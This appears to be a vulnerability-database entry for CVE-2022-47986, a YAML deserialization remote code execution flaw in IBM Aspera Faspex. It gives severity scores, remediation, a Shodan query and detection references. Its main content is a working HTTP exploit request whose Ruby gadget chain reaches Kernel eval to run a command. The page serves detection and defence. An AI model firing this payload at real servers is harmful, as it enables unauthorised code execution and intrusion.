🔙 목록으로 돌아가기

CVE-2022-47986: IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution

TitleIBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution
Authorcoldfish
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationThe obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x.
CVSS Score9.8
EPSS Score0.94303
CVE IDCVE-2022-47986
CWE IDCWE-502
Shodan Queryhtml:"Aspera Faspex"cpe:"cpe:2.3:o:linux:linux_kernel"
Tags cve cve2022 ibm aspera faspex kev packetstorm linux vkev vuln

🔍 Vulnerability Description

IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.

🌐 HTTP Request

POST /aspera/faspex/package_relay/relay_package HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Connection: close
Content-Length: 1293
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip

{"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n    i: x\n- !ruby/object:Gem::SpecFetcher\n    i: y\n- !ruby/object:Gem::Requirement\n  requirements:\n    !ruby/object:Gem::Package::TarReader\n    io: &1 !ruby/object:Net::BufferedIO\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\n         read: 0\n         header: \"pew\"\n      debug_output: &1 !ruby/object:Net::WriteAdapter\n         socket: &1 !ruby/object:PrettyPrint\n             output: !ruby/object:Net::WriteAdapter\n                 socket: &1 !ruby/module \"Kernel\"\n                 method_id: :eval\n             newline: \"throw `id`\"\n             buffer: {}\n             group_stack:\n              - !ruby/object:PrettyPrint::Group\n                break: true\n         method_id: :breakable\n", "package_name": "JWRU", "package_note": "38FEOQhjmlFCJ4QLxFNxot1nHAu", "original_sender_name": "38FEOQhjmlFCJ4QLxFNxot1nHAu", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "rvXGu5SK", "delivery_title": "jHgk", "delivery_note": "ftpE", "delete_after_download": true, "delete_after_download_condition": "IDK"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47986.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-47986.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A